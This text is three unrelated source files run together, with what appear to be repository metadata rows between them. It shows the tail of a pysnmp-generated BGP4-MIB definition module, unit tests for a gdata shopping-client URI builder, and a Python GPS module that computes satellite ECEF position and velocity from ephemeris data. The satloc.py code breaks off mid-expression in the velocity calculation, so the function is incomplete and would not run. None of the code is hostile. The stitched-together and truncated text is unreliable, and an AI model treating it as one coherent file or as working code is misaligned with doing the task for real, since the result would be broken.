if mibBuilder.loadTexts: bgpPeerLocalAddr.setStatus('current')
if mibBuilder.loadTexts: bgpPeerLocalAddr.setDescription("The local IP address of this entry's BGP connection.")
bgpPeerLocalPort = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerLocalPort.setStatus('current')
if mibBuilder.loadTexts: bgpPeerLocalPort.setDescription('The local port for the TCP connection between the BGP peers.')
bgpPeerRemoteAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 7), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerRemoteAddr.setStatus('current')
if mibBuilder.loadTexts: bgpPeerRemoteAddr.setDescription("The remote IP address of this entry's BGP peer.")
bgpPeerRemotePort = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerRemotePort.setStatus('current')
if mibBuilder.loadTexts: bgpPeerRemotePort.setDescription('The remote port for the TCP connection between the BGP peers. Note that the objects bgpPeerLocalAddr, bgpPeerLocalPort, bgpPeerRemoteAddr and bgpPeerRemotePort provide the appropriate reference to the standard MIB TCP connection table.')
bgpPeerRemoteAs = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerRemoteAs.setStatus('current')
if mibBuilder.loadTexts: bgpPeerRemoteAs.setDescription('The remote autonomous system number.')
bgpPeerInUpdates = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerInUpdates.setStatus('current')
if mibBuilder.loadTexts: bgpPeerInUpdates.setDescription('The number of BGP UPDATE messages received on this connection. This object should be initialized to zero (0) when the connection is established.')
bgpPeerOutUpdates = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerOutUpdates.setStatus('current')
if mibBuilder.loadTexts: bgpPeerOutUpdates.setDescription('The number of BGP UPDATE messages transmitted on this connection. This object should be initialized to zero (0) when the connection is established.')
bgpPeerInTotalMessages = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerInTotalMessages.setStatus('current')
if mibBuilder.loadTexts: bgpPeerInTotalMessages.setDescription('The total number of messages received from the remote peer on this connection. This object should be initialized to zero when the connection is established.')
bgpPeerOutTotalMessages = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerOutTotalMessages.setStatus('current')
if mibBuilder.loadTexts: bgpPeerOutTotalMessages.setDescription('The total number of messages transmitted to the remote peer on this connection. This object should be initialized to zero when the connection is established.')
bgpPeerLastError = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 14), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerLastError.setStatus('current')
if mibBuilder.loadTexts: bgpPeerLastError.setDescription('The last error code and subcode seen by this peer on this connection. If no error has occurred, this field is zero. Otherwise, the first byte of this two byte OCTET STRING contains the error code, and the second byte contains the subcode.')
bgpPeerFsmEstablishedTransitions = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerFsmEstablishedTransitions.setStatus('current')
if mibBuilder.loadTexts: bgpPeerFsmEstablishedTransitions.setDescription('The total number of times the BGP FSM transitioned into the established state.')
bgpPeerFsmEstablishedTime = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 16), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerFsmEstablishedTime.setStatus('current')
if mibBuilder.loadTexts: bgpPeerFsmEstablishedTime.setDescription('This timer indicates how long (in seconds) this peer has been in the Established state or how long since this peer was last in the Established state. It is set to zero when a new peer is configured or the router is booted.')
bgpPeerConnectRetryInterval = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 17), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerConnectRetryInterval.setStatus('current')
if mibBuilder.loadTexts: bgpPeerConnectRetryInterval.setDescription('Time interval in seconds for the ConnectRetry timer. The suggested value for this timer is 120 seconds.')
bgpPeerHoldTime = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(3, 65535), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerHoldTime.setStatus('current')
if mibBuilder.loadTexts: bgpPeerHoldTime.setDescription('Time interval in seconds for the Hold Timer established with the peer. The value of this object is calculated by this BGP speaker by using the smaller of the value in bgpPeerHoldTimeConfigured and the Hold Time received in the OPEN message. This value must be at lease three seconds if it is not zero (0) in which case the Hold Timer has not been established with the peer, or, the value of bgpPeerHoldTimeConfigured is zero (0).')
bgpPeerKeepAlive = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 19), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(1, 21845), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerKeepAlive.setStatus('current')
if mibBuilder.loadTexts: bgpPeerKeepAlive.setDescription('Time interval in seconds for the KeepAlive timer established with the peer. The value of this object is calculated by this BGP speaker such that, when compared with bgpPeerHoldTime, it has the same proportion as what bgpPeerKeepAliveConfigured has when compared with bgpPeerHoldTimeConfigured. If the value of this object is zero (0), it indicates that the KeepAlive timer has not been established with the peer, or, the value of bgpPeerKeepAliveConfigured is zero (0).')
bgpPeerHoldTimeConfigured = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 20), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(3, 65535), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerHoldTimeConfigured.setStatus('current')
if mibBuilder.loadTexts: bgpPeerHoldTimeConfigured.setDescription('Time interval in seconds for the Hold Time configured for this BGP speaker with this peer. This value is placed in an OPEN message sent to this peer by this BGP speaker, and is compared with the Hold Time field in an OPEN message received from the peer when determining the Hold Time (bgpPeerHoldTime) with the peer. This value must not be less than three seconds if it is not zero (0) in which case the Hold Time is NOT to be established with the peer. The suggested value for this timer is 90 seconds.')
bgpPeerKeepAliveConfigured = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 21), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(1, 21845), ))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerKeepAliveConfigured.setStatus('current')
if mibBuilder.loadTexts: bgpPeerKeepAliveConfigured.setDescription("Time interval in seconds for the KeepAlive timer configured for this BGP speaker with this peer. The value of this object will only determine the KEEPALIVE messages' frequency relative to the value specified in bgpPeerHoldTimeConfigured; the actual time interval for the KEEPALIVE messages is indicated by bgpPeerKeepAlive. A reasonable maximum value for this timer would be configured to be one third of that of bgpPeerHoldTimeConfigured. If the value of this object is zero (0), no periodical KEEPALIVE messages are sent to the peer after the BGP connection has been established. The suggested value for this timer is 30 seconds.")
bgpPeerMinASOriginationInterval = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 22), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerMinASOriginationInterval.setStatus('current')
if mibBuilder.loadTexts: bgpPeerMinASOriginationInterval.setDescription('Time interval in seconds for the MinASOriginationInterval timer. The suggested value for this timer is 15 seconds.')
bgpPeerMinRouteAdvertisementInterval = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 23), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerMinRouteAdvertisementInterval.setStatus('current')
if mibBuilder.loadTexts: bgpPeerMinRouteAdvertisementInterval.setDescription('Time interval in seconds for the MinRouteAdvertisementInterval timer. The suggested value for this timer is 30 seconds.')
bgpPeerInUpdateElapsedTime = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 3, 1, 24), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpPeerInUpdateElapsedTime.setStatus('current')
if mibBuilder.loadTexts: bgpPeerInUpdateElapsedTime.setDescription('Elapsed time in seconds since the last BGP UPDATE message was received from the peer. Each time bgpPeerInUpdates is incremented, the value of this object is set to zero (0).')
bgpIdentifier = MibScalar((1, 3, 6, 1, 2, 1, 15, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgpIdentifier.setStatus('current')
if mibBuilder.loadTexts: bgpIdentifier.setDescription('The BGP Identifier of local system.')
bgp4PathAttrTable = MibTable((1, 3, 6, 1, 2, 1, 15, 6), )
if mibBuilder.loadTexts: bgp4PathAttrTable.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrTable.setDescription('The BGP-4 Received Path Attribute Table contains information about paths to destination networks received from all BGP4 peers.')
bgp4PathAttrEntry = MibTableRow((1, 3, 6, 1, 2, 1, 15, 6, 1), ).setIndexNames((0, "BGP4-MIB", "bgp4PathAttrIpAddrPrefix"), (0, "BGP4-MIB", "bgp4PathAttrIpAddrPrefixLen"), (0, "BGP4-MIB", "bgp4PathAttrPeer"))
if mibBuilder.loadTexts: bgp4PathAttrEntry.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrEntry.setDescription('Information about a path to a network.')
bgp4PathAttrPeer = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 1), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrPeer.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrPeer.setDescription('The IP address of the peer where the path information was learned.')
bgp4PathAttrIpAddrPrefixLen = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrIpAddrPrefixLen.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrIpAddrPrefixLen.setDescription('Length in bits of the IP address prefix in the Network Layer Reachability Information field.')
bgp4PathAttrIpAddrPrefix = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrIpAddrPrefix.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrIpAddrPrefix.setDescription('An IP address prefix in the Network Layer Reachability Information field. This object is an IP address containing the prefix with length specified by bgp4PathAttrIpAddrPrefixLen. Any bits beyond the length specified by bgp4PathAttrIpAddrPrefixLen are zeroed.')
bgp4PathAttrOrigin = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("igp", 1), ("egp", 2), ("incomplete", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrOrigin.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrOrigin.setDescription('The ultimate origin of the path information.')
bgp4PathAttrASPathSegment = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrASPathSegment.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrASPathSegment.setDescription('The sequence of AS path segments. Each AS path segment is represented by a triple <type, length, value>. The type is a 1-octet field which has two possible values: 1 AS_SET: unordered set of ASs a route in the UPDATE message has traversed 2 AS_SEQUENCE: ordered set of ASs a route in the UPDATE message has traversed. The length is a 1-octet field containing the number of ASs in the value field. The value field contains one or more AS numbers, each AS is represented in the octet string as a pair of octets according to the following algorithm: first-byte-of-pair = ASNumber / 256; second-byte-of-pair = ASNumber & 255;')
bgp4PathAttrNextHop = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 6), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrNextHop.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrNextHop.setDescription('The address of the border router that should be used for the destination network.')
bgp4PathAttrMultiExitDisc = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrMultiExitDisc.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrMultiExitDisc.setDescription('This metric is used to discriminate between multiple exit points to an adjacent autonomous system. A value of -1 indicates the absence of this attribute.')
bgp4PathAttrLocalPref = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrLocalPref.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrLocalPref.setDescription("The originating BGP4 speaker's degree of preference for an advertised route. A value of -1 indicates the absence of this attribute.")
bgp4PathAttrAtomicAggregate = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("lessSpecificRrouteNotSelected", 1), ("lessSpecificRouteSelected", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrAtomicAggregate.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrAtomicAggregate.setDescription('Whether or not the local system has selected a less specific route without selecting a more specific route.')
bgp4PathAttrAggregatorAS = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrAggregatorAS.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrAggregatorAS.setDescription('The AS number of the last BGP4 speaker that performed route aggregation. A value of zero (0) indicates the absence of this attribute.')
bgp4PathAttrAggregatorAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 11), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrAggregatorAddr.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrAggregatorAddr.setDescription('The IP address of the last BGP4 speaker that performed route aggregation. A value of 0.0.0.0 indicates the absence of this attribute.')
bgp4PathAttrCalcLocalPref = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrCalcLocalPref.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrCalcLocalPref.setDescription('The degree of preference calculated by the receiving BGP4 speaker for an advertised route. A value of -1 indicates the absence of this attribute.')
bgp4PathAttrBest = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("false", 1), ("true", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrBest.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrBest.setDescription('An indication of whether or not this route was chosen as the best BGP4 route.')
bgp4PathAttrUnknown = MibTableColumn((1, 3, 6, 1, 2, 1, 15, 6, 1, 14), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bgp4PathAttrUnknown.setStatus('current')
if mibBuilder.loadTexts: bgp4PathAttrUnknown.setDescription('One or more path attributes not understood by this BGP4 speaker. Size zero (0) indicates the absence of such attribute(s). Octets beyond the maximum size, if any, are not recorded by this object.')
bgpTraps = MibIdentifier((1, 3, 6, 1, 2, 1, 15, 7))
bgpEstablished = NotificationType((1, 3, 6, 1, 2, 1, 15, 7, 1)).setObjects(("BGP4-MIB", "bgpPeerLastError"), ("BGP4-MIB", "bgpPeerState"))
if mibBuilder.loadTexts: bgpEstablished.setStatus('current')
if mibBuilder.loadTexts: bgpEstablished.setDescription('The BGP Established event is generated when the BGP FSM enters the ESTABLISHED state.')
bgpBackwardTransition = NotificationType((1, 3, 6, 1, 2, 1, 15, 7, 2)).setObjects(("BGP4-MIB", "bgpPeerLastError"), ("BGP4-MIB", "bgpPeerState"))
if mibBuilder.loadTexts: bgpBackwardTransition.setStatus('current')
if mibBuilder.loadTexts: bgpBackwardTransition.setDescription('The BGPBackwardTransition Event is generated when the BGP FSM moves from a higher numbered state to a lower numbered state.')
mibBuilder.exportSymbols("BGP4-MIB", bgpPeerInUpdates=bgpPeerInUpdates, bgpPeerAdminStatus=bgpPeerAdminStatus, bgp4PathAttrMultiExitDisc=bgp4PathAttrMultiExitDisc, bgp4PathAttrAtomicAggregate=bgp4PathAttrAtomicAggregate, bgp4PathAttrUnknown=bgp4PathAttrUnknown, bgpPeerFsmEstablishedTime=bgpPeerFsmEstablishedTime, bgpPeerInUpdateElapsedTime=bgpPeerInUpdateElapsedTime, bgpPeerState=bgpPeerState, bgpPeerNegotiatedVersion=bgpPeerNegotiatedVersion, PYSNMP_MODULE_ID=bgp, bgpVersion=bgpVersion, bgp4PathAttrTable=bgp4PathAttrTable, bgpEstablished=bgpEstablished, bgp4PathAttrPeer=bgp4PathAttrPeer, bgpPeerLastError=bgpPeerLastError, bgpPeerOutUpdates=bgpPeerOutUpdates, bgpPeerRemotePort=bgpPeerRemotePort, bgpPeerLocalAddr=bgpPeerLocalAddr, bgpPeerKeepAliveConfigured=bgpPeerKeepAliveConfigured, bgp4PathAttrEntry=bgp4PathAttrEntry, bgp4PathAttrNextHop=bgp4PathAttrNextHop, bgpBackwardTransition=bgpBackwardTransition, bgpPeerInTotalMessages=bgpPeerInTotalMessages, bgp4PathAttrLocalPref=bgp4PathAttrLocalPref, bgp=bgp, bgpLocalAs=bgpLocalAs, bgpPeerRemoteAs=bgpPeerRemoteAs, bgp4PathAttrASPathSegment=bgp4PathAttrASPathSegment, bgp4PathAttrAggregatorAddr=bgp4PathAttrAggregatorAddr, bgpPeerLocalPort=bgpPeerLocalPort, bgp4PathAttrCalcLocalPref=bgp4PathAttrCalcLocalPref, bgp4PathAttrAggregatorAS=bgp4PathAttrAggregatorAS, bgpPeerHoldTime=bgpPeerHoldTime, bgpPeerMinRouteAdvertisementInterval=bgpPeerMinRouteAdvertisementInterval, bgp4PathAttrIpAddrPrefix=bgp4PathAttrIpAddrPrefix, bgpPeerIdentifier=bgpPeerIdentifier, bgpPeerRemoteAddr=bgpPeerRemoteAddr, bgpPeerKeepAlive=bgpPeerKeepAlive, bgpPeerFsmEstablishedTransitions=bgpPeerFsmEstablishedTransitions, bgp4PathAttrOrigin=bgp4PathAttrOrigin, bgpPeerMinASOriginationInterval=bgpPeerMinASOriginationInterval, bgp4PathAttrIpAddrPrefixLen=bgp4PathAttrIpAddrPrefixLen, bgp4PathAttrBest=bgp4PathAttrBest, bgpPeerTable=bgpPeerTable, bgpPeerConnectRetryInterval=bgpPeerConnectRetryInterval, bgpPeerHoldTimeConfigured=bgpPeerHoldTimeConfigured, 
bgpIdentifier=bgpIdentifier, bgpTraps=bgpTraps, bgpPeerOutTotalMessages=bgpPeerOutTotalMessages, bgpPeerEntry=bgpPeerEntry)
| [
"dcwangmit01@gmail.com"
] | dcwangmit01@gmail.com |
9d06f25c74335110a8269e61dfd06f9c67088181 | 71afd03278068857a979ba57b0892d4fb44387a2 | /tests/gdata_tests/contentforshopping_test.py | 79666626f5450b26025b783ea41c70cf440e3e2f | [
"Apache-2.0"
] | permissive | dvska/gdata-python3 | 9848717aca61f9e34ebfc3b4b291c6f75aaabc4b | a34c35901473e4ba7223ea4607136141301fbe88 | refs/heads/master | 2021-06-02T20:42:37.570392 | 2020-12-24T10:17:47 | 2020-12-24T10:17:47 | 93,769,460 | 19 | 25 | Apache-2.0 | 2020-12-24T10:17:49 | 2017-06-08T16:18:42 | Python | UTF-8 | Python | false | false | 3,411 | py | #
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License 2.0;
"""Content API for Shopping tests"""
# __author__ = 'afshar (Ali Afshar)'
import unittest
from gdata.contentforshopping import client
class CFSClientTest(unittest.TestCase):
def test_uri_missing_account_id(self):
c = client.ContentForShoppingClient()
self.assertRaises(ValueError, c._create_uri,
account_id=None, projection=None, resource='a/b')
def test_uri_bad_projection(self):
c = client.ContentForShoppingClient()
self.assertRaises(ValueError, c._create_uri,
account_id='123', projection='banana', resource='a/b')
def test_good_default_account_id(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection=None, resource='a/b')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/a/b/generic')
def test_override_request_account_id(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id='321', projection=None, resource='a/b')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/321/a/b/generic')
def test_default_projection(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection=None, resource='a/b')
self.assertEqual(c.cfs_projection, 'generic')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/a/b/generic')
def test_default_projection_change(self):
c = client.ContentForShoppingClient(account_id='123', projection='schema')
uri = c._create_uri(account_id=None, projection=None, resource='a/b')
self.assertEqual(c.cfs_projection, 'schema')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/a/b/schema')
def test_request_projection(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection='schema', resource='a/b')
self.assertEqual(c.cfs_projection, 'generic')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/a/b/schema')
def test_request_resource(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection=None, resource='x/y/z')
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/x/y/z/generic')
def test_path_single(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection=None, resource='r',
path=['1'])
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/r/generic/1')
def test_path_multiple(self):
c = client.ContentForShoppingClient(account_id='123')
uri = c._create_uri(account_id=None, projection=None, resource='r',
path=['1', '2'])
self.assertEqual(uri,
'https://content.googleapis.com/content/v1/123/r/generic/1/2')
if __name__ == '__main__':
unittest.main()
| [
"OR"
] | OR |
58b963b434f59c65974163b99df220974713b385 | 02779ff959cf88513d44162cf4ab076bb23cb471 | /satloc.py | a28b0b0ba143c660b6175e0b295e6b971bfc4839 | [] | no_license | WillFife/SatNav | 5432f970946c1d4c983dd39621042fbdc4582324 | 49520aa532f6e19b20b05a9fb5af0345c2e20683 | refs/heads/master | 2023-01-03T20:17:30.540351 | 2020-10-30T19:26:04 | 2020-10-30T19:26:04 | 291,811,877 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,852 | py | """
Retrieve the CSV file for navigation data for the
32 possible satellites at a time given by GPS week and GPS seconds.
Also create a CSV of the ECEF position and velocities from the given navigation data.
@author: William Fife
"""
# import dependencies
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import astropy.units as u
import sys
import os
# SatNav imports
from mathUtils import *
from datafile import DataFile
from wgs84 import wgs84Constants, WGS84, OrbitalMath
from time_conv import *
DIR = 'data/lab3/'
def createNavDataCsv(gpsWeek, gpsSec, navdir=DIR[:-1]):
print('--- Creating navData csv for GPS week {}, GPS Sec {} s ---'.format(gpsWeek, gpsSec))
# import matlab runner for extracting nav data
sys.path.insert(1, '/Applications/MATLAB_R2020a.app')
import matlab.engine
# Compute UTC time to give to matlab function 'RetrieveNavigationData.m'
utc = gps2utc(gpsWeek, gpsSec)
utc_str = '{}'.format(str(utc))
print(utc_str)
# Access matlab function and create csv
try:
eng = matlab.engine.start_matlab()
eng.retrieveNavigationData(float(gpsWeek), float(gpsSec), utc_str, 0, navdir, nargout=0)
eng.quit()
except Exception as e:
print("\nSomething went wrong with MATLAB... here is the exception")
print(e)
def satloc(gpsWeek, gpsSec, svID, navdir=DIR, usefile=None, printSat=False):
    """
    Return satellite position and velocity expressed in and relative
    to the ECEF reference frame.

    Implements what appears to be the standard GPS broadcast-ephemeris
    user algorithm (Kepler solve + perturbation corrections) — TODO
    confirm against IS-GPS-200 if precision matters.

    Inputs:
        gpsWeek - Week of true time at which satellite ECEF state is desired
        gpsSec  - Seconds of week
        svID    - The satellite PRN number

    Outputs:
        r_sv_ecef - Position of satellite in ECEF [m]
        v_sv_ecef - Velocity of satellite in ECEF [m/s]
    """
    # Formulate filename and retrieve nav data; a float gpsSec is formatted
    # with 4 decimals to match the file naming used by createNavDataCsv.
    navFile = 'filler'
    if type(gpsSec) == float and usefile == None:
        navFile = 'gpsW_SOW_{}_{:.4f}_navData.csv'.format(int(gpsWeek), gpsSec)
    elif type(gpsSec) != float and usefile == None:
        navFile = 'gpsW_SOW_{}_{}_navData.csv'.format(int(gpsWeek), gpsSec)
    elif usefile != None:
        navFile = usefile
    navDF = pd.read_csv(navdir + navFile)
    sat = navDF[navDF['SVID'] == svID]

    # load in variables needed (broadcast ephemeris elements for this SV)
    GM = 3.986005e14          # Earth gravitational parameter m3/s2
    OmegaE = 7.2921151467e-5  # Earth mean rotation rate rad/s
    t_oe = float(sat['te'])   # ephemeris epoch
    t = float(sat['tc'])      # clock time
    A = float(sat['sqrta']**2)   # semi-major axis (sqrt stored in file)
    dn = float(sat['dn'])        # mean motion correction
    M0 = float(sat['M0'])        # mean anomaly at epoch
    a0 = float(sat['af0'])       # SV clock bias
    a1 = float(sat['af1'])       # SV clock drift
    a2 = float(sat['af2'])       # SV clock drift rate
    e = float(sat['e'])          # eccentricity
    i0 = float(sat['i0'])        # inclination at epoch
    L0 = float(sat['L0'])        # longitude of ascending node at epoch
    i_dot = float(sat['didt'])   # inclination rate
    lan_dot = float(sat['dOdt'])  # rate of right ascension
    omega0 = float(sat['omega0'])  # argument of perigee
    C_uc = float(sat['Cuc'])  # harmonic correction terms (latitude/radius/inclination)
    C_us = float(sat['Cus'])
    C_rc = float(sat['Crc'])
    C_rs = float(sat['Crs'])
    C_ic = float(sat['Cic'])
    C_is = float(sat['Cis'])

    if printSat:
        print(sat)

    # initial computations for perifocal state
    # SV clock correction, then time from ephemeris reference epoch.
    dtc = a0 + a1*(gpsSec - t) + a2*((gpsSec - t)**2)
    tc = t_oe - dtc
    tk = gpsSec - tc
    n0 = np.sqrt(GM / A**3)   # computed mean motion
    n = n0 + dn               # corrected mean motion
    M = M0 + n*tk             # mean anomaly at tk
    E = M

    # Kepler's equation Newton's method for Eccentric Anomaly
    orbmath = OrbitalMath()
    # Only 20 iterations used
    E = orbmath.E_newton(M, e, max_iter=20)
    v_k = orbmath.true_anomaly_from_E(E, e)  # true anomaly
    argl_k = v_k + omega0                    # argument of latitude

    # correction terms (second-harmonic perturbations)
    dargl = C_us*np.sin(2*argl_k) + C_uc*np.cos(2*argl_k)
    dr = C_rs*np.sin(2*argl_k) + C_rc*np.cos(2*argl_k)
    dinc = C_is*np.sin(2*argl_k) + C_ic*np.cos(2*argl_k)

    # corrected terms
    argl = argl_k + dargl
    r_k = A*(1 - e*np.cos(E)) + dr
    i_k = i0 + dinc + i_dot*tk

    # position in perifocal frame
    p_x = r_k*np.cos(argl)
    p_y = r_k*np.sin(argl)

    # corrected longitude of ascending node (accounts for Earth rotation)
    lan_k = L0 + (lan_dot - OmegaE)*tk - OmegaE * t_oe

    # ECEF position (rotate perifocal coordinates through lan_k and i_k)
    x_ecef = p_x*np.cos(lan_k) - p_y*np.cos(i_k)*np.sin(lan_k)
    y_ecef = p_x*np.sin(lan_k) + p_y*np.cos(i_k)*np.cos(lan_k)
    z_ecef = p_y*np.sin(i_k)

    # intermediate terms for satellite velocity (time derivatives of the above)
    E_k_dot = n / (1 - e*np.cos(E))
    v_k_dot = E_k_dot*np.sqrt(1-e**2) / (1 - e*np.cos(E))
    i_k_dot = i_dot + 2*v_k_dot*(C_is*np.cos(2*argl_k) - C_ic*np.sin(2*argl_k))
    argl_dot = v_k_dot + 2*v_k_dot*(C_us*np.cos(2*argl_k) - C_uc*np.sin(2*argl_k))
    r_k_dot = e*A*E_k_dot*np.sin(E) + 2*v_k_dot*(C_rs*np.cos(2*argl_k) - C_rc*np.sin(2*argl_k))
    lan_k_dot = lan_dot - OmegaE

    # perifocal velocity
    p_vx = r_k_dot*np.cos(argl_k) - r_k*argl_dot*np.sin(argl_k)
    p_vy = r_k_dot*np.sin(argl_k) + r_k*argl_dot*np.cos(argl_k)

    # ECEF velocity (product rule applied to the rotation above)
    Vx_ecef = -p_x*lan_k_dot*np.sin(lan_k) + \
        p_vx*np.cos(lan_k) - \
        p_vy*np.sin(lan_k)*np.cos(i_k) - \
